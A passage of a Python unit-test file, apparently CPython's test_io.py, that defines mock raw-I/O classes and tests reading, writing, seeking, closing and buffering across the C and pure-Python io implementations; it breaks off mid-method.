# test_io.py
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
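# A minimal sketch of that pattern (illustrative only; the class names below
# are hypothetical and do not exist in this file):
#
#     class ExampleBufferTest(unittest.TestCase):
#         def test_roundtrip(self):
#             # self.BytesIO is whichever implementation the subclass selects
#             buf = self.BytesIO(b"data")
#             self.assertEqual(buf.read(), b"data")
#
#     class CExampleBufferTest(ExampleBufferTest):
#         BytesIO = io.BytesIO       # C implementation
#
#     class PyExampleBufferTest(ExampleBufferTest):
#         BytesIO = pyio.BytesIO     # pure-Python implementation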
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import assert_python_ok, run_python_until_end
from test.support import FakePath
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import threading
except ImportError:
threading = None
try:
import ctypes
except ImportError:
def byteslike(*pos, **kw):
return array.array("b", bytes(*pos, **kw))
else:
def byteslike(*pos, **kw):
"""Create a bytes-like object having no string or sequence methods"""
data = bytes(*pos, **kw)
obj = EmptyStruct()
ctypes.resize(obj, len(data))
memoryview(obj).cast("B")[:] = data
return obj
class EmptyStruct(ctypes.Structure):
pass
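# Illustrative use of byteslike() (a sketch; behaviour assumed, not asserted
# here):
#
#     buf = byteslike(5)      # 5-byte writable buffer
#     f.readinto(buf)         # can be filled through the buffer protocol
#     bytes(buf)              # -> the filled contents; with ctypes available,
#                             #    buf itself has no bytes/str methods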
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
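# How the default RawIOBase.read() drains the mock's read stack (an
# illustrative sketch; test_RawIOBase_read below makes the real assertions):
#
#     rawio = CMockRawIOWithoutRead((b"abc", b"d"))
#     rawio.read(2)   # -> b"ab"  readinto() copies 2 bytes, b"c" stays queued
#     rawio.read(2)   # -> b"c"   a shorter chunk is returned as-is
#     rawio.read(2)   # -> b"d"
#     rawio.read(2)   # -> b""    stack exhausted; counted as an extraneous read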
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
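# Note: the MockFileIO classes above behave like BytesIO but record the size of
# every read()/readinto() call in .read_history; test_buffering relies on this
# to check how many bytes each buffered read pulls from the raw stream.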
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
def truncate(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
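# Illustrative behaviour of the non-blocking writer mock (a sketch; the values
# follow from write() above and are not asserted here):
#
#     raw = CMockNonBlockWriterIO()
#     raw.block_on(b"k")
#     raw.write(b"jklmn")   # -> 1: only b"j" accepted, stops at the blocker
#     raw.write(b"klm")     # -> None: simulates EWOULDBLOCK, clears the blocker
#     raw.write(b"klm")     # -> 3: blocker gone, the whole payload is accepted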
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b" world\n\n\n")
self.assertEqual(f.write(buffer), 9)
buffer[:] = b"*" * 9 # Overwrite our copy of the data
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(bytes(data), b" worl")
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(byteslike(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
f.seek(0)
data = byteslike(5)
self.assertEqual(f.readinto1(data), 5)
self.assertEqual(bytes(data), b"hello")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
try:
self.assertEqual(f.seek(self.LARGE), self.LARGE)
except (OverflowError, ValueError):
self.skipTest("no largefile support")
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
def test_optional_abilities(self):
# Test for OSError when optional APIs are not supported
# The purpose of this test is to try fileno(), reading, writing and
# seeking operations with various objects that indicate they do not
# support these operations.
def pipe_reader():
[r, w] = os.pipe()
os.close(w) # So that read() is harmless
return self.FileIO(r, "r")
def pipe_writer():
[r, w] = os.pipe()
self.addCleanup(os.close, r)
# Guarantee that we can write into the pipe without blocking
thread = threading.Thread(target=os.read, args=(r, 100))
thread.start()
self.addCleanup(thread.join)
return self.FileIO(w, "w")
def buffered_reader():
return self.BufferedReader(self.MockUnseekableIO())
def buffered_writer():
return self.BufferedWriter(self.MockUnseekableIO())
def buffered_random():
return self.BufferedRandom(self.BytesIO())
def buffered_rw_pair():
return self.BufferedRWPair(self.MockUnseekableIO(),
self.MockUnseekableIO())
def text_reader():
class UnseekableReader(self.MockUnseekableIO):
writable = self.BufferedIOBase.writable
write = self.BufferedIOBase.write
return self.TextIOWrapper(UnseekableReader(), "ascii")
def text_writer():
class UnseekableWriter(self.MockUnseekableIO):
readable = self.BufferedIOBase.readable
read = self.BufferedIOBase.read
return self.TextIOWrapper(UnseekableWriter(), "ascii")
tests = (
(pipe_reader, "fr"), (pipe_writer, "fw"),
(buffered_reader, "r"), (buffered_writer, "w"),
(buffered_random, "rws"), (buffered_rw_pair, "rw"),
(text_reader, "r"), (text_writer, "w"),
(self.BytesIO, "rws"), (self.StringIO, "rws"),
)
for [test, abilities] in tests:
if test is pipe_writer and not threading:
continue # Skip subtest that uses a background thread
with self.subTest(test), test() as obj:
readable = "r" in abilities
self.assertEqual(obj.readable(), readable)
writable = "w" in abilities
self.assertEqual(obj.writable(), writable)
if isinstance(obj, self.TextIOBase):
data = "3"
elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)):
data = b"3"
else:
self.fail("Unknown base class")
if "f" in abilities:
obj.fileno()
else:
self.assertRaises(OSError, obj.fileno)
if readable:
obj.read(1)
obj.read()
else:
self.assertRaises(OSError, obj.read, 1)
self.assertRaises(OSError, obj.read)
if writable:
obj.write(data)
else:
self.assertRaises(OSError, obj.write, data)
if sys.platform.startswith("win") and test in (
pipe_reader, pipe_writer):
# Pipes seem to appear as seekable on Windows
continue
seekable = "s" in abilities
self.assertEqual(obj.seekable(), seekable)
if seekable:
obj.tell()
obj.seek(0)
else:
self.assertRaises(OSError, obj.tell)
self.assertRaises(OSError, obj.seek, 0)
if writable and seekable:
obj.truncate()
obj.truncate(0)
else:
self.assertRaises(OSError, obj.truncate)
self.assertRaises(OSError, obj.truncate, 0)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w')
bytes_fn = bytes(fn_with_NUL, 'ascii')
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertRaises(ValueError, self.open, bytes_fn, 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_readline_nonsizeable(self):
# Issue #30061
# Crash when readline() returns an object without __len__
class R(self.IOBase):
def readline(self):
return None
self.assertRaises((TypeError, StopIteration), next, R())
def test_next_nonsizeable(self):
# Issue #30061
# Crash when __next__() returns an object without __len__
class R(self.IOBase):
def __next__(self):
return None
self.assertRaises(TypeError, R().readlines, 1)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OS X this test consumes large resources; it takes
# a long time to build the >2 GiB file and needs >2 GiB of disk space,
# so the 'largefile' resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with support.check_warnings(('', ResourceWarning)):
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
def check(f):
with f:
self.assertEqual(f.write(a), n)
f.writelines((a,))
check(self.BytesIO())
check(self.FileIO(support.TESTFN, "w"))
check(self.BufferedWriter(self.MockRawIO()))
check(self.BufferedRandom(self.MockRawIO()))
check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()))
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with support.check_warnings(('', ResourceWarning)):
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2GB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite a failed flush
# and that flush() is called before the file is closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(support.TESTFN, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(support.TESTFN, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default limited RawIOBase.read(n) implementation (which
# calls readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
fd = os.open(support.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
def test_bad_opener_negative_1(self):
# Issue #27066.
def badopener(fname, flags):
return -1
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -1')
def test_bad_opener_other_negative(self):
# Issue #27066.
def badopener(fname, flags):
return -2
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -2')
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
def test_invalid_newline(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
def test_buffered_readinto_mixin(self):
# Test the implementation provided by BufferedIOBase
class Stream(self.BufferedIOBase):
def read(self, size):
return b"12345"
read1 = read
stream = Stream()
for method in ("readinto", "readinto1"):
with self.subTest(method):
buffer = byteslike(5)
self.assertEqual(getattr(stream, method)(buffer), 5)
self.assertEqual(bytes(buffer), b"12345")
def test_fspath_support(self):
def check_path_succeeds(path):
with self.open(path, "w") as f:
f.write("egg\n")
with self.open(path, "r") as f:
self.assertEqual(f.read(), "egg\n")
check_path_succeeds(FakePath(support.TESTFN))
check_path_succeeds(FakePath(support.TESTFN.encode('utf-8')))
with self.open(support.TESTFN, "w") as f:
bad_path = FakePath(f.fileno())
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(None)
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(FloatingPointError)
with self.assertRaises(FloatingPointError):
self.open(bad_path, 'w')
# ensure that refcounting is correct with some error conditions
with self.assertRaisesRegex(ValueError, 'read/write/append mode'):
self.open(FakePath(support.TESTFN), 'rwxa')
def test_RawIOBase_readall(self):
# Exercise the default unlimited RawIOBase.read() and readall()
# implementations.
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.read(), b"abcdefg")
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.readall(), b"abcdefg")
def test_BufferedIOBase_readinto(self):
# Exercise the default BufferedIOBase.readinto() and readinto1()
# implementations (which call read() or read1() internally).
class Reader(self.BufferedIOBase):
def __init__(self, avail):
self.avail = avail
def read(self, size):
result = self.avail[:size]
self.avail = self.avail[size:]
return result
def read1(self, size):
"""Returns no more than 5 bytes at once"""
return self.read(min(size, 5))
tests = (
# (test method, total data available, read buffer size, expected
# read size)
("readinto", 10, 5, 5),
("readinto", 10, 6, 6), # More than read1() can return
("readinto", 5, 6, 5), # Buffer larger than total available
("readinto", 6, 7, 6),
("readinto", 10, 0, 0), # Empty buffer
("readinto1", 10, 5, 5), # Result limited to single read1() call
("readinto1", 10, 6, 5), # Buffer larger than read1() can return
("readinto1", 5, 6, 5), # Buffer larger than total available
("readinto1", 6, 7, 5),
("readinto1", 10, 0, 0), # Empty buffer
)
UNUSED_BYTE = 0x81
for test in tests:
with self.subTest(test):
method, avail, request, result = test
reader = Reader(bytes(range(avail)))
buffer = bytearray((UNUSED_BYTE,) * request)
method = getattr(reader, method)
self.assertEqual(method(buffer), result)
self.assertEqual(len(buffer), request)
self.assertSequenceEqual(buffer[:result], range(result))
unused = (UNUSED_BYTE,) * (request - result)
self.assertSequenceEqual(buffer[result:], unused)
self.assertEqual(len(reader.avail), avail - result)
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
pass
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
del bufio
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = "%s.%s" % (self.tp.__module__, self.tp.__qualname__)
self.assertEqual(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertEqual(repr(b), "<%s name=b'dummy'>" % clsname)
def test_recursive_repr(self):
# Issue #25455
raw = self.MockRawIO()
b = self.tp(raw)
with support.swap_attr(raw, 'name', b):
try:
repr(b) # Should not crash
except RuntimeError:
pass
def test_flush_error_on_close(self):
# Test that the buffered file is closed despite a failed flush
# and that flush() is called before the file is closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
